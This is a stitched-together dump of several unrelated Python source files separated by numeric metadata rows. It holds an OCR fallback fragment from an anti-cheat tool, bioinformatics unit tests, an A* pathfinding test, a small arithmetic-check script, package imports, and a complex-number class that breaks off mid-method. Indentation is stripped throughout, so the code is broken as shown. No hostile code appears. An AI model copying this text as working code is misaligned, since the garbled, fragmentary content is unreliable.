if last_line != "":
pass
else:
lines = lines[:-1]
last_line = lines[-1]
if " " in last_line:
sep = " "
rest = last_line.split(sep, 1)[0]
print("[INFO] " + "Résultat de l'OCR de secours : " + rest)
tools.log("[INFO] " + "Résultat de l'OCR de secours: " + rest)
return rest
elif method == 2:
sep = "&"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lastl = list(file)[-1]
file.close()
file = open("user_ids\\" + userid + ".txt", "w")
file.write(lastl)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
file.close()
last_line = lastl
if "\n" in last_line:
sep = "\n"
last_line = last_line.split(sep, 1)[0]
else:
pass
if " " in last_line:
sep = " "
rest = last_line.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
print("[INFO] " + "Résultat de l'OCR de secours: " + rest)
tools.log("[INFO] " + "Résultat de l'OCR de secours: " + rest)
return rest
else:
print(Fore.RED + Style.BRIGHT + "[WARN] Méthode de secours incorrect. Abandon." + Style.RESET_ALL)
tools.log("[WARN] Méthode de secours incorrecte. Abandon.")
return "ERROR"
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
| 37.666667 | 197 | 0.528319 | 1,037 | 9,040 | 4.512054 | 0.134041 | 0.066681 | 0.043599 | 0.054499 | 0.809575 | 0.809575 | 0.798461 | 0.783501 | 0.783501 | 0.783501 | 0 | 0.009284 | 0.34469 | 9,040 | 239 | 198 | 37.824268 | 0.780554 | 0 | 0 | 0.800995 | 0 | 0.024876 | 0.255053 | 0.023507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024876 | false | 0.019901 | 0.024876 | 0 | 0.124378 | 0.069652 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c17b45f05a854b5e438833745f51a9ca2d677963 | 19,227 | py | Python | countess/tests/test_lib_basic_coding.py | VariantEffect/Enrich2-py3 | 5f8534c8c9259d90d99d70e5bd9140fd0fdc8ea4 | [
"BSD-3-Clause"
] | 4 | 2020-01-14T19:24:07.000Z | 2020-01-16T18:11:35.000Z | countess/tests/test_lib_basic_coding.py | VariantEffect/CountESS | 5f8534c8c9259d90d99d70e5bd9140fd0fdc8ea4 | [
"BSD-3-Clause"
] | 3 | 2020-01-01T10:38:15.000Z | 2020-01-03T09:45:41.000Z | countess/tests/test_lib_basic_coding.py | VariantEffect/CountESS | 5f8534c8c9259d90d99d70e5bd9140fd0fdc8ea4 | [
"BSD-3-Clause"
] | 1 | 2022-02-20T00:35:24.000Z | 2022-02-20T00:35:24.000Z | import unittest
from ..libraries.basic import BasicSeqLib
from .utilities import load_config_data, create_file_path
from .methods import HDF5TestComponent
CFG_FILE = "basic_coding.json"
CFG_DIR = "data/config/basic/"
READS_DIR = create_file_path("basic/", "data/reads/")
RESULT_DIR = "data/result/basic/"
LIBTYPE = "basic"
FILE_EXT = "tsv"
FILE_SEP = "\t"
CODING_STR = "c"
# -------------------------------------------------------------------------- #
#
# INTEGRATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsIntegrated(unittest.TestCase):
def setUp(self):
prefix = "integrated"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
# Set all filter parameters
cfg["fastq"]["filters"]["max N"] = 0
cfg["fastq"]["filters"]["chastity"] = True
cfg["fastq"]["filters"]["avg quality"] = 38
cfg["fastq"]["filters"]["min quality"] = 20
# Set trim parameters
cfg["fastq"]["start"] = 4
cfg["fastq"]["length"] = 3
cfg["fastq"]["reverse"] = True
cfg["variants"]["wild type"]["sequence"] = "TTT"
# Set Variant parameters
cfg["variants"]["wild type"]["reference offset"] = 3
cfg["variants"]["min counts"] = 2
cfg["variants"]["max mutations"] = 1
cfg["variants"]["use aligner"] = True
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# SYNONYMOUS COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsSynonymous(unittest.TestCase):
def setUp(self):
prefix = "synonymous"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# SINGLE MUTATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsSingleMutation(unittest.TestCase):
def setUp(self):
prefix = "single_mut"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# MULTIMUTATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsMultiMutation(unittest.TestCase):
def setUp(self):
prefix = "multi_mut"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# WILDTYPE COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWildType(unittest.TestCase):
def setUp(self):
prefix = "wildtype"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ MAXN FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithMaxNFQFilter(unittest.TestCase):
def setUp(self):
prefix = "filter_maxn"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["filters"]["max N"] = 0
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ CHASTE FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithChaste(unittest.TestCase):
def setUp(self):
prefix = "filter_chastity"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["filters"]["chastity"] = True
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ MIN QUAL FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithMinQualFQFilter(unittest.TestCase):
def setUp(self):
prefix = "filter_minq"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["filters"]["min quality"] = 20
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ AVG QUAL FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithAvgQualFQFilter(unittest.TestCase):
def setUp(self):
prefix = "filter_avgq"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["filters"]["avg quality"] = 38
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ TRIM LENGTH COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsTrimLengthSetting(unittest.TestCase):
def setUp(self):
prefix = "trim_len"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["length"] = 3
cfg["variants"]["wild type"]["sequence"] = "AAA"
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ TRIM START COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsTrimStartSetting(unittest.TestCase):
def setUp(self):
prefix = "trim_start"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["start"] = 4
cfg["variants"]["wild type"]["sequence"] = "AAA"
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ REVERSE COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsReverseSetting(unittest.TestCase):
def setUp(self):
prefix = "revcomp"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["reverse"] = True
cfg["variants"]["wild type"]["sequence"] = "TTTTTT"
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT WT-OFFSET COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithRefOffset(unittest.TestCase):
def setUp(self):
prefix = "reference_offset"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["variants"]["wild type"]["reference offset"] = 6
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT MIN COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantMinCount(unittest.TestCase):
def setUp(self):
prefix = "variant_mincounts"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["variants"]["min counts"] = 2
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT MAX MUTATIONS COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantMaxMutations(unittest.TestCase):
def setUp(self):
prefix = "variant_maxmutations"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["variants"]["max mutations"] = 1
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT ALIGNER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantAligner(unittest.TestCase):
def setUp(self):
prefix = "use_aligner"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["variants"]["use aligner"] = True
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# COUNTS ONLY MODE
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsOnlyMode(unittest.TestCase):
def setUp(self):
prefix = "counts_only"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["counts file"] = "{}/{}.tsv".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# MAIN
#
# -------------------------------------------------------------------------- #
if __name__ == "__main__":
unittest.main()
| 31.061389 | 78 | 0.48874 | 1,637 | 19,227 | 5.500916 | 0.080635 | 0.060411 | 0.128373 | 0.079289 | 0.832871 | 0.810772 | 0.759023 | 0.723709 | 0.723709 | 0.710716 | 0 | 0.003933 | 0.272689 | 19,227 | 618 | 79 | 31.11165 | 0.640017 | 0.190669 | 0 | 0.837587 | 0 | 0 | 0.079261 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118329 | false | 0 | 0.009281 | 0 | 0.167053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1acc2da66d99bbbc942227ce2bc75a988d329fa | 1,416 | py | Python | aoc/test_astar.py | Godsmith/adventofcode | 3c59ea66830f82b63881e0ea19bfe3076f2a500d | [
"Unlicense"
] | null | null | null | aoc/test_astar.py | Godsmith/adventofcode | 3c59ea66830f82b63881e0ea19bfe3076f2a500d | [
"Unlicense"
] | null | null | null | aoc/test_astar.py | Godsmith/adventofcode | 3c59ea66830f82b63881e0ea19bfe3076f2a500d | [
"Unlicense"
] | null | null | null | from aoc.astar import astar
def test_astar():
maze = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
start = (0, 0)
end = (7, 6)
path = astar(maze, start, end)
assert path == [(0, 0), (1, 1), (2, 2), (3, 3), (3, 4), (4, 5), (5, 6), (6, 6), (7, 6)]
def test_other_adjacent():
maze = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
start = (0, 0)
end = (7, 6)
adjacent = [(0, -1), (0, 1), (-1, 0), (1, 0)]
path = astar(maze, start, end, adjacent=adjacent)
assert path == [(0, 0), (1, 0), (1, 1), (2, 1), (2, 2), (3, 2), (3, 3),
(3, 4), (3, 5), (4, 5), (5, 5), (6, 5), (6, 6), (7, 6)]
| 33.714286 | 91 | 0.303672 | 297 | 1,416 | 1.43771 | 0.070707 | 0.796253 | 1.039813 | 1.217799 | 0.744731 | 0.543326 | 0.543326 | 0.543326 | 0.543326 | 0.543326 | 0 | 0.316808 | 0.41596 | 1,416 | 41 | 92 | 34.536585 | 0.199516 | 0 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.060606 | false | 0 | 0.030303 | 0 | 0.090909 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1eec662d18c9c963ce636e517730cfcbf340c43 | 715 | py | Python | ger/TTP/SV1/1551.py | aLagoG/kygerand | 0991cf5d5c3d49f4602b6992d4e3bdec8e27898e | [
"MIT"
] | 1 | 2017-09-16T04:05:31.000Z | 2017-09-16T04:05:31.000Z | ger/TTP/SV1/1551.py | aLagoG/kygerand | 0991cf5d5c3d49f4602b6992d4e3bdec8e27898e | [
"MIT"
] | 9 | 2017-01-25T19:34:38.000Z | 2020-07-27T17:02:09.000Z | ger/TTP/SV1/1551.py | aLagoG/kygerand | 0991cf5d5c3d49f4602b6992d4e3bdec8e27898e | [
"MIT"
] | null | null | null | j = 1
while 1:
try:
line = raw_input()
a, b, c = [int(i) for i in line.split()]
if(a+b == c): print "Case "+str(j) + ": "+str(a)+"+"+str(b)+"="+str(c)
elif(a == b+c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"+"+str(c)
elif(a-b == c): print "Case "+str(j) + ": "+str(a)+"-"+str(b)+"="+str(c)
elif(a == b-c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"-"+str(c)
elif(a*b == c): print "Case "+str(j) + ": "+str(a)+"*"+str(b)+"="+str(c)
elif(a == b*c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"*"+str(c)
elif(a/b == c): print "Case "+str(j) + ": "+str(a)+"/"+str(b)+"="+str(c)
elif(a == b/c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"/"+str(c)
j += 1
except EOFError: break | 47.666667 | 74 | 0.448951 | 135 | 715 | 2.37037 | 0.17037 | 0.05625 | 0.084375 | 0.2 | 0.7875 | 0.7875 | 0.7875 | 0.7875 | 0.7875 | 0.7875 | 0 | 0.005034 | 0.166434 | 715 | 15 | 75 | 47.666667 | 0.531879 | 0 | 0 | 0 | 0 | 0 | 0.100559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.533333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
a9b89274c3e00be46e2e8e634dc102ae24863c95 | 243 | py | Python | src/datasets/__init__.py | gchhablani/toxic-spans-detection | 5eeba0c069bef8c707d9c5fef8c6048c98d89ba5 | [
"MIT"
] | 11 | 2021-02-25T03:03:37.000Z | 2021-10-18T03:51:23.000Z | src/datasets/__init__.py | gchhablani/toxic-spans-detection | 5eeba0c069bef8c707d9c5fef8c6048c98d89ba5 | [
"MIT"
] | null | null | null | src/datasets/__init__.py | gchhablani/toxic-spans-detection | 5eeba0c069bef8c707d9c5fef8c6048c98d89ba5 | [
"MIT"
] | 5 | 2021-02-25T03:02:07.000Z | 2021-05-18T15:59:01.000Z | from src.datasets.toxic_spans_tokens import *
from src.datasets.toxic_spans_spans import *
from src.datasets.toxic_spans_tokens_spans import *
from src.datasets.toxic_spans_multi_spans import *
from src.datasets.toxic_spans_crf_tokens import * | 48.6 | 51 | 0.860082 | 38 | 243 | 5.157895 | 0.236842 | 0.178571 | 0.382653 | 0.510204 | 0.897959 | 0.897959 | 0.55102 | 0 | 0 | 0 | 0 | 0 | 0.078189 | 243 | 5 | 52 | 48.6 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
a9c801e53601b611f507ad7879b6576dad4608d4 | 12,121 | py | Python | cmpx/number.py | Omar-Belghaouti/PythonComplex | 4f286ee4a4c8c042a02a5a2e92d063377c15c713 | [
"MIT"
] | 7 | 2019-09-10T20:35:44.000Z | 2021-09-30T11:14:25.000Z | cmpx/number.py | Omar-Belghaouti/PythonComplex | 4f286ee4a4c8c042a02a5a2e92d063377c15c713 | [
"MIT"
] | null | null | null | cmpx/number.py | Omar-Belghaouti/PythonComplex | 4f286ee4a4c8c042a02a5a2e92d063377c15c713 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 10 17:36:25 2019
@author: Omar Belghaouti
"""
from .error import print_err, print_res
from math import sqrt
# Complex class for complex number manipulations
class Complex():
# Constructor
"""
re : is the real part of complex number
im : is the imaginary part of complex number
restore : whenever an error occurs on any operation of a complex number, the last instance will be restored (By default it's true)
"""
def __init__(self, re=0, im=0, restore=True):
try:
if not ((isinstance(re, int) or isinstance(re, float)) and (isinstance(im, int) or isinstance(im, float))):
raise ValueError('Arguments re and im arguments are neither integers nor floats')
if not isinstance(restore, bool):
raise ValueError('Argument restore is not boolean')
self.re = re
self.im = im
self.restore = restore
except ValueError as err:
print_err(err)
"""
This method instanciate a Complex object from a complex number
"""
@staticmethod
def fromComplex(comp, restore=True):
try:
if isinstance(comp, complex):
return Complex(comp.real, comp.imag, restore)
else:
raise ValueError('The number you passed is not a complex')
except ValueError as err:
print_err(err)
# Operator overloading 1 : +
def __add__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return Complex(self.re + other.re, self.im + other.im, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 2 : -
def __sub__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return Complex(self.re - other.re, self.im - other.im, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 3 : *
def __mul__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return Complex(self.re * other.re - self.im * other.im, self.re * other.im + self.im * other.re, self.restore)
except ValueError as err:
print_err(err)
# Operator overloading 4 : /
def __truediv__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
den = other * other.con()
num = self * other.con()
if den.re == 0 and self.restore:
print_res()
return Complex(self.re, self.im, self.restore)
return Complex(num.re / den.re, num.im / den.re, self.restore)
except (ZeroDivisionError, ValueError) as err:
print_err(err)
# Operator overloading 5 : //
def __floordiv__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
den = other * other.con()
num = self * other.con()
if den.re == 0 and self.restore:
print_res()
return Complex(self.re, self.im, self.restore)
return Complex(num.re // den.re, num.im // den.re, self.restore)
except (ZeroDivisionError, ValueError) as err:
print_err(err)
def __gt__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return self.mod() > other.mod()
except ValueError as err:
print_err(err)
# Operator overloading 7 : >=
def __ge__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return self.mod() >= other.mod()
except ValueError as err:
print_err(err)
# Operator overloading 8: <
def __lt__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return not self >= other
except ValueError as err:
print_err(err)
# Operator overloading 9: <=
def __le__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return not self > other
except ValueError as err:
print_err(err)
# Operator overloading 10: ==
def __eq__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
if isinstance(other, complex):
other = Complex(other.real, other.imag)
else:
other = Complex(other)
return (self.re == other.re) and (self.im == other.im)
except ValueError as err:
print_err(err)
# Operator overloading 11: !=
def __ne__(self, other):
try:
if other is None:
raise ValueError('The second number is None')
if not isinstance(other, Complex):
